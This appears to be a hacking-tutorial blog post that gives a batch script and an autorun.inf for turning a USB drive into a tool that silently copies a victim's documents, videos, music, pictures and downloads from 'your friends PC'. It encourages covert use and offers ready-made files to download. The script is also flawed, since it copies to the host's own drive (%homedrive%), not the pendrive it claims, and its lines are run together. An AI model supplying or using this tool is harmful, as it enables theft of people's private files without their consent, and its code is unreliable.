I am going to teach you how you can do this from batch file with the help of autorun.inf file. Let me tell you the basic things what will happen.
When you plug in in your Pen drive, system will look up for autorun.inf and after you click 'yes' to autorun,it will execute the batch file and hence copy all files to pendrive.
STEP 1) Copy and paste the following code to notepad and save it with filename.bat
@echo off :CHECK if not exist "%homedrive%\Copied_files" md "%homedrive%\Copied_files" if exist "%systemdrive%\Documents and Settings" goto COPIER goto ERROR
:COPIER if not exist "%homedrive%\Copied_files\%computername%" md "%homedrive%\Copied_files\%computername%" if not exist "%homedrive%\Copied_files\%computername%\VIDEOS" md "%homedrive%\Copied_files\%computername%\VIDEOS" if not exist "%homedrive%\Copied_files\%computername%\PICTURES" md "%homedrive%\Copied_files\%computername%\PICTURES" if not exist "%homedrive%\Copied_files\%computername%\MUSIC" md "%homedrive%\Copied_files\%computername%\MUSIC" if not exist "%homedrive%\Copied_files\%computername%\DOWNLOADS" md "%homedrive%\Copied_files\%computername%\DOWNLOADS" copy /y "%userprofile%\My Documents\*.*" "%homedrive%\Copied_files\%computername%" copy /y "%userprofile%\My Documents\My Videos" "%homedrive%\Copied_files\%computername%\VIDEOS" copy /y "%userprofile%\My Documents\My Music" "%homedrive%\Copied_files\%computername%\MUSIC" copy /y "%userprofile%\My Documents\My Pictures" "%homedrive%\Copied_files\%computername%\PICTURES" copy /y "%userprofile%\My Documents\Downloads" "%homedrive%\Copied_files\%computername%\DOWNLOADS" MSG %username% "DONE!" exit
:ERROR exit
STEP 2) Open a new notepad and save the code below with filename "autorun.inf" [autorun] Open=Filename.bat Action=File Copier
STEP 3) Copy the two files, autorun.inf and Filename.bat in your flash drive.
Then plug in your device to your friends PC and do the evil things.
If you don't want to make all these files , just download and unzip the files(made by me) to your pendrive.
As you are applying these hacks to copy someone's files, someone else could make to hack yours. So if you wanna save your ass you better look at the SECURE USB PORTS page to lock the USB ports of lappie.